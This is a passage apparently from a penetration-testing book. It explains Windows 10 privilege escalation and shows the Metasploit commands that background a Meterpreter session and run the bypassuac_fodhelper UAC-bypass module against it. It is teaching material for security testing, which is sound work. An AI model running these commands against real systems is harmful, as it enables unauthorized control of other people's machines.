Local system escalation
In Windows 10, we can utilize a different technique to bypass the existing privilege. One of the drawbacks of this attack is, in order to get system-level access, the affected local user must be part of the local administrators group.
Attackers will be able to run the Meterpreter shell only in the context of the user. To bypass this restriction, we can leverage multiple post-exploit modules. We will be sending the background
command to our Meterpreter shell to run the post exploit module. In this example, we will utilize the bypassuac_fodhelper
post-exploit module, as shown in Figure 12.5:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(multi/handler) > set session 1
msf exploit(multi/handler) > exploit
Figure 12.5: Exploiting Windows 10 local privilege escalation
The bypassuac_fodhelper
module in the Meterpreter shell will utilize...